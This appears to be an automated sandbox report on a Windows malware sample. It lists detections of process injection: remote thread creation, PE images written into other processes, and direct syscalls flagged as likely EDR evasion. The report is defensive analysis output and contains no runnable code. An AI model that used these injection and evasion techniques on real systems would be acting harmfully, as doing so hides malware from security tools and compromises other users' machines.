Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D0000 protect: page execute and read and writeJump to behavior
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,1_2_00401670
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01304CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,22_2_01304CC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015B4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,25_2_015B4CC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B04CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,27_2_00B04CC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012C4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,29_2_012C4CC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01134CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,31_2_01134CC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01314CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,33_2_01314CC0
Creates a thread in another existing process (thread injection)
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: E51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: BE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: 1001360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: CE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: 1281360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: 1531360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: A41360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: 1201360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: 10B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: 1291360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: 6A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: AE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe EIP: ED1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B71360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: CE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 591360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1631360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 8D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1041360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: CC1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1111360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1221360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B31360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 6D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1091360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1261360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1191360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1501360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F41360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A21360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: EE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 16D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1061360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1451360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: CF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: ED1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1161360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 13A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 861360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: BF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1061360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1251360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1271360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 801360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 861360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 791360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 15A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: CD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1251360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: EC1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1021360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1341360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D01360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 8D1360Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtAllocateVirtualMemory: Direct from: 0x77672B9C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtProtectVirtualMemory: Direct from: 0x77672F9C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtCreateFile: Direct from: 0x77672FEC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtOpenFile: Direct from: 0x77672DCC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtAdjustPrivilegesToken: Direct from: 0x77672EAC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtSetTimerEx: Direct from: 0x77667B2E
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtTerminateThread: Direct from: 0x77672FCC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtSetInformationThread: Direct from: 0x77672ECC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtQueryInformationToken: Direct from: 0x77672CAC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtAllocateVirtualMemory: Direct from: 0x77672BEC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtDeviceIoControlFile: Direct from: 0x77672AEC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtQuerySystemInformation: Direct from: 0x776748CC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtQueryAttributesFile: Direct from: 0x77672E6C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtSetInformationThread: Direct from: 0x77672B4C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtOpenSection: Direct from: 0x77672E0C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtSetInformationThread: Direct from: 0x776663F9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtAllocateVirtualMemory: Direct from: 0x77673C9C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtQuerySystemInformation: Direct from: 0x77672DFC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtQueryInformationProcess: Direct from: 0x77672C26
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtAllocateVirtualMemory: Direct from: 0x77672BFC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtUnmapViewOfSection: Direct from: 0x77672D3C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtResumeThread: Direct from: 0x776736AC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtSetInformationProcess: Direct from: 0x77672C5C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtMapViewOfSection: Direct from: 0x77672D1C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtNotifyChangeKey: Direct from: 0x77673C2C
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeNtCreateMutant: Direct from: 0x776735CC
Injects a PE file into a foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1002000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1282000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1532000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A42000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1202000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1292000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 592000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1632000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1042000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1112000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1222000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B32000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1092000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1262000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1192000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1502000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F42000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A22000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 16D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1062000 value starts with: 4D5AJump to behavior
